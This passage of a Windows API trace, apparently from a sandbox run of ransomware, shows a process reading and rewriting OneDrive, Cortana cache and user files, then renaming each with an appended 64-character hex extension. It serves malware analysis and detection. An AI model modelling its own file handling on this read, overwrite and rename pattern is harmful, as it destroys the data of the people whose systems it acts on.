0x600000 [0112.350] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x170) returned 0x3186700 [0112.351] NtSetInformationFile (FileHandle=0x330, IoStatusBlock=0x2b3ff60, FileInformation=0x3186700, Length=0x170, FileInformationClass=0xa) returned 0x0 [0112.351] CloseHandle (hObject=0x330) returned 1 [0112.352] GetProcessHeap () returned 0x600000 [0112.352] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0112.353] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0112.357] NtQueryObject (in: Handle=0x310, ObjectInformationClass=0x1, ObjectInformation=0x30c8250, ObjectInformationLength=0x10004, ReturnLength=0x2b3ff70 | out: ObjectInformation=0x30c8250, ReturnLength=0x2b3ff70) returned 0x0 [0112.357] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\AutoPlayOptIn.png", lpString2=".95330469460BDE0BD01D562C95D2247141E4DE8C3E3044F9947CDE6820D1793C" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\AutoPlayOptIn.png.95330469460BDE0BD01D562C95D2247141E4DE8C3E3044F9947CDE6820D1793C") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\AutoPlayOptIn.png.95330469460BDE0BD01D562C95D2247141E4DE8C3E3044F9947CDE6820D1793C" [0112.357] GetProcessHeap () returned 0x600000 [0112.358] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x170) returned 0x3186fd0 [0112.358] NtSetInformationFile (FileHandle=0x310, IoStatusBlock=0x2b3ff60, FileInformation=0x3186fd0, Length=0x170, FileInformationClass=0xa) returned 0x0 [0112.358] CloseHandle (hObject=0x310) returned 1 [0112.359] GetProcessHeap () returned 0x600000 [0112.359] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30c81a0 | out: hHeap=0x600000) returned 1 [0112.360] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0112.376] ReadFile (in: hFile=0x310, lpBuffer=0x30c0180, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048) returned 1 [0112.376] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0112.382] WriteFile (in: hFile=0x310, lpBuffer=0x30c0180, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048) returned 0x0 [0112.383] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0112.390] NtQueryObject (in: Handle=0x310, ObjectInformationClass=0x1, ObjectInformation=0x30a00f8, ObjectInformationLength=0x10004, ReturnLength=0x2b3ff70 | out: ObjectInformation=0x30a00f8, ReturnLength=0x2b3ff70) returned 0x0 [0112.390] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\FileSync.LocalizedResources.dll", lpString2=".B02E8FD9E9454A3948E80880CE41F79966E7EBD3E70BE0F7850D19468FD0B55E" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\FileSync.LocalizedResources.dll.B02E8FD9E9454A3948E80880CE41F79966E7EBD3E70BE0F7850D19468FD0B55E") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\FileSync.LocalizedResources.dll.B02E8FD9E9454A3948E80880CE41F79966E7EBD3E70BE0F7850D19468FD0B55E" [0112.390] GetProcessHeap () returned 0x600000 [0112.390] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x18c) returned 0x3187560 [0112.391] NtSetInformationFile (FileHandle=0x310, IoStatusBlock=0x2b3ff60, FileInformation=0x3187560, Length=0x18c, FileInformationClass=0xa) returned 0x0 [0112.395] CloseHandle (hObject=0x310) returned 1 [0112.395] GetProcessHeap () returned 0x600000 [0112.395] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0112.395] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0112.456] NtQueryObject (in: Handle=0x328, ObjectInformationClass=0x1, ObjectInformation=0x6603e8, ObjectInformationLength=0x10004, ReturnLength=0x2b3ff70 | out: ObjectInformation=0x6603e8, ReturnLength=0x2b3ff70) returned 0x0 [0112.457] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\FileSyncApi.dll", lpString2=".7C4F35637ABA3868C43D161B981F6E119751C815DC38D42EB1BD7750FD699766" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\FileSyncApi.dll.7C4F35637ABA3868C43D161B981F6E119751C815DC38D42EB1BD7750FD699766") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\FileSyncApi.dll.7C4F35637ABA3868C43D161B981F6E119751C815DC38D42EB1BD7750FD699766" [0112.457] GetProcessHeap () returned 0x600000 [0112.457] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x16c) returned 0x3186b68 [0112.457] NtSetInformationFile (FileHandle=0x328, IoStatusBlock=0x2b3ff60, FileInformation=0x3186b68, Length=0x16c, FileInformationClass=0xa) returned 0x0 [0112.458] CloseHandle (hObject=0x328) returned 1 [0112.459] GetProcessHeap () returned 0x600000 [0112.459] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x660338 | out: hHeap=0x600000) returned 1 [0112.462] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0112.783] NtQueryObject (in: Handle=0x328, ObjectInformationClass=0x1, ObjectInformation=0x30f3070, ObjectInformationLength=0x10004, ReturnLength=0x2b3ff70 | out: ObjectInformation=0x30f3070, ReturnLength=0x2b3ff70) returned 0x0 [0112.783] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ScreenshotLogo.png", lpString2=".09DFB22411CBD54E130CBCE348DB50AAAFB76F26F7BB092FEB2BCFEEC9F7D26A" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ScreenshotLogo.png.09DFB22411CBD54E130CBCE348DB50AAAFB76F26F7BB092FEB2BCFEEC9F7D26A") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ScreenshotLogo.png.09DFB22411CBD54E130CBCE348DB50AAAFB76F26F7BB092FEB2BCFEEC9F7D26A" [0112.783] GetProcessHeap () returned 0x600000 [0112.783] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x172) returned 0x63beb8 [0112.783] NtSetInformationFile (FileHandle=0x328, IoStatusBlock=0x2b3ff60, FileInformation=0x63beb8, Length=0x172, FileInformationClass=0xa) returned 0x0 [0112.797] CloseHandle (hObject=0x328) returned 1 [0112.798] GetProcessHeap () returned 0x600000 [0112.798] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0112.798] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0112.879] ReadFile (in: hFile=0x328, lpBuffer=0x6a85c8, nNumberOfBytesToRead=0x4e00, lpNumberOfBytesRead=0x0, lpOverlapped=0x688490 | out: lpBuffer=0x6a85c8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x688490) returned 1 [0112.879] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0112.885] WriteFile (in: hFile=0x328, lpBuffer=0x6a85c8*, nNumberOfBytesToWrite=0x4e00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x688490 | out: lpBuffer=0x6a85c8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x688490) returned 1 [0112.885] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0112.886] NtQueryObject (in: Handle=0x328, ObjectInformationClass=0x1, ObjectInformation=0x688540, ObjectInformationLength=0x10004, ReturnLength=0x2b3ff70 | out: ObjectInformation=0x688540, ReturnLength=0x2b3ff70) returned 0x0 [0112.887] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ExclusionList.xml", lpString2=".3BC64D9FC908A11054D1771DFC3CC7A5C2CAEF0107CF35900C0E28C04AA33D0A" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ExclusionList.xml.3BC64D9FC908A11054D1771DFC3CC7A5C2CAEF0107CF35900C0E28C04AA33D0A") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ExclusionList.xml.3BC64D9FC908A11054D1771DFC3CC7A5C2CAEF0107CF35900C0E28C04AA33D0A" [0112.887] GetProcessHeap () returned 0x600000 [0112.887] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x170) returned 0x315cda0 [0112.887] NtSetInformationFile (FileHandle=0x328, IoStatusBlock=0x2b3ff60, FileInformation=0x315cda0, Length=0x170, FileInformationClass=0xa) returned 0x0 [0112.892] CloseHandle (hObject=0x328) returned 1 [0112.893] GetProcessHeap () returned 0x600000 [0112.893] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x688490 | out: hHeap=0x600000) returned 1 [0112.893] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0112.913] ReadFile (in: hFile=0x328, lpBuffer=0x3310430, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x32f02f8 | out: lpBuffer=0x3310430*, lpNumberOfBytesRead=0x0, lpOverlapped=0x32f02f8) returned 1 [0112.913] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0112.913] WriteFile (in: hFile=0x328, lpBuffer=0x3310430*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x32f02f8 | out: lpBuffer=0x3310430*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x32f02f8) returned 1 [0112.914] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0112.915] NtQueryObject (in: Handle=0x328, ObjectInformationClass=0x1, ObjectInformation=0x32f03a8, ObjectInformationLength=0x10004, ReturnLength=0x2b3ff70 | out: ObjectInformation=0x32f03a8, ReturnLength=0x2b3ff70) returned 0x0 [0112.915] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\FileSyncSessions.dll", lpString2=".FA610DCFBF35A41B4000CD2BE5CF878FCB6A64D4DB28A92612064909AF7C0247" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\FileSyncSessions.dll.FA610DCFBF35A41B4000CD2BE5CF878FCB6A64D4DB28A92612064909AF7C0247") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\FileSyncSessions.dll.FA610DCFBF35A41B4000CD2BE5CF878FCB6A64D4DB28A92612064909AF7C0247" [0112.915] GetProcessHeap () returned 0x600000 [0112.915] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x176) returned 0x63b898 [0112.915] NtSetInformationFile (FileHandle=0x328, IoStatusBlock=0x2b3ff60, FileInformation=0x63b898, Length=0x176, FileInformationClass=0xa) returned 0x0 [0112.916] CloseHandle (hObject=0x328) returned 1 [0112.917] GetProcessHeap () returned 0x600000 [0112.917] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x32f02f8 | out: hHeap=0x600000) returned 1 [0112.917] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0112.920] ReadFile (in: hFile=0x328, lpBuffer=0x3310430, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x32f02f8 | out: lpBuffer=0x3310430*, lpNumberOfBytesRead=0x0, lpOverlapped=0x32f02f8) returned 1 [0112.920] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0114.160] NtQueryObject (in: Handle=0x330, ObjectInformationClass=0x1, ObjectInformation=0x30a00f8, ObjectInformationLength=0x10004, ReturnLength=0x2b3ff70 | out: ObjectInformation=0x30a00f8, ReturnLength=0x2b3ff70) returned 0x0 [0114.160] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\2021-02-18_130550_474-cac.log", lpString2=".EFD5669D5E254F361B3AA83A39849289B056C4AA065DA8B70F30F8DCCFA9F522" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\2021-02-18_130550_474-cac.log.EFD5669D5E254F361B3AA83A39849289B056C4AA065DA8B70F30F8DCCFA9F522") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\2021-02-18_130550_474-cac.log.EFD5669D5E254F361B3AA83A39849289B056C4AA065DA8B70F30F8DCCFA9F522" [0114.160] GetProcessHeap () returned 0x600000 [0114.160] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x17c) returned 0x6d5b00 [0114.160] NtSetInformationFile (FileHandle=0x330, IoStatusBlock=0x2b3ff60, FileInformation=0x6d5b00, Length=0x17c, FileInformationClass=0xa) returned 0x0 [0114.161] CloseHandle (hObject=0x330) returned 1 [0114.161] GetProcessHeap () returned 0x600000 [0114.161] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0114.162] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0119.142] NtQueryObject (in: Handle=0x33c, ObjectInformationClass=0x1, ObjectInformation=0x30a00f8, ObjectInformationLength=0x10004, ReturnLength=0x2b3ff70 | out: ObjectInformation=0x30a00f8, ReturnLength=0x2b3ff70) returned 0x0 [0119.143] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_5[1].txt", lpString2=".05742E1A68479879EA5BB5407460712860AC88A3648BF2926D53F8904EB44779" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_5[1].txt.05742E1A68479879EA5BB5407460712860AC88A3648BF2926D53F8904EB44779") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\C1J92J4X\\6\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_5[1].txt.05742E1A68479879EA5BB5407460712860AC88A3648BF2926D53F8904EB44779" [0119.143] GetProcessHeap () returned 0x600000 [0119.143] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x23e) returned 0x3184970 [0119.143] NtSetInformationFile (FileHandle=0x33c, IoStatusBlock=0x2b3ff60, FileInformation=0x3184970, Length=0x23e, FileInformationClass=0xa) returned 0x0 [0119.144] CloseHandle (hObject=0x33c) returned 1 [0119.145] GetProcessHeap () returned 0x600000 [0119.145] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0119.146] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0122.017] ReadFile (in: hFile=0x32c, lpBuffer=0x3310430, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x0, lpOverlapped=0x32f02f8 | out: lpBuffer=0x3310430*, lpNumberOfBytesRead=0x0, lpOverlapped=0x32f02f8) returned 1 [0122.020] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0122.023] WriteFile (in: hFile=0x318, lpBuffer=0x3338588*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3318450 | out: lpBuffer=0x3338588*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3318450) returned 1 [0122.023] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0122.574] ReadFile (in: hFile=0x308, lpBuffer=0x30c0180, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048) returned 1 [0122.574] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0122.576] WriteFile (in: hFile=0x32c, lpBuffer=0x30e82d8, nNumberOfBytesToWrite=0x6000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30c81a0 | out: lpBuffer=0x30e82d8, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30c81a0) returned 0x0 [0122.595] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0122.596] NtQueryObject (in: Handle=0x308, ObjectInformationClass=0x1, ObjectInformation=0x30a00f8, ObjectInformationLength=0x10004, ReturnLength=0x2b3ff70 | out: ObjectInformation=0x30a00f8, ReturnLength=0x2b3ff70) returned 0x0 [0122.596] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\4iuw0nZrNkShxp3.xlsx", lpString2=".A1FB0F222354E10E927009A7A59ADC7F4A090B254F84990F1B2EC0D0D8512622" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\4iuw0nZrNkShxp3.xlsx.A1FB0F222354E10E927009A7A59ADC7F4A090B254F84990F1B2EC0D0D8512622") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\4iuw0nZrNkShxp3.xlsx.A1FB0F222354E10E927009A7A59ADC7F4A090B254F84990F1B2EC0D0D8512622" [0122.597] GetProcessHeap () returned 0x600000 [0122.597] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x132) returned 0x318d3f0 [0122.597] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x2b3ff60, FileInformation=0x318d3f0, Length=0x132, FileInformationClass=0xa) returned 0x0 [0122.719] CloseHandle (hObject=0x308) returned 1 [0122.723] GetProcessHeap () returned 0x600000 [0122.723] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0122.745] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0122.812] ReadFile (in: hFile=0x320, lpBuffer=0x3360140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0122.813] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0122.815] NtQueryObject (in: Handle=0x320, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x2b3ff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x2b3ff70) returned 0x0 [0122.815] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\AG haIVxOY4iH21cyJ.jpg", lpString2=".AFA506EABBF735B5A08BF648214ACEE4919C807BEDF2DF6B889AA6AEC106DD4E" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\AG haIVxOY4iH21cyJ.jpg.AFA506EABBF735B5A08BF648214ACEE4919C807BEDF2DF6B889AA6AEC106DD4E") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\AG haIVxOY4iH21cyJ.jpg.AFA506EABBF735B5A08BF648214ACEE4919C807BEDF2DF6B889AA6AEC106DD4E" [0122.815] GetProcessHeap () returned 0x600000 [0122.815] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x136) returned 0x31516b8 [0122.815] NtSetInformationFile (FileHandle=0x320, IoStatusBlock=0x2b3ff60, FileInformation=0x31516b8, Length=0x136, FileInformationClass=0xa) returned 0x0 [0122.817] CloseHandle (hObject=0x320) returned 1 [0122.818] GetProcessHeap () returned 0x600000 [0122.818] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0122.818] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0122.846] WriteFile (in: hFile=0x308, lpBuffer=0x690478*, nNumberOfBytesToWrite=0x5800, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x670340) returned 1 [0122.847] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2b3ff7c, lpCompletionKey=0x2b3ff78, lpOverlapped=0x2b3ff74) returned 1 [0123.396] NtQueryObject (in: Handle=0x32c, ObjectInformationClass=0x1, ObjectInformation=0x6703f0, ObjectInformationLength=0x10004, ReturnLength=0x2b3ff70 | out: ObjectInformation=0x6703f0, ReturnLength=0x2b3ff70) returned 0x0 [0123.397] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\mwhRadXni-2S9.mp4", lpString2=".7030B58C51D8E565BAC50B0E562EFEE4B3340FF153D922BA62DDB6F8C12CC170" | out: 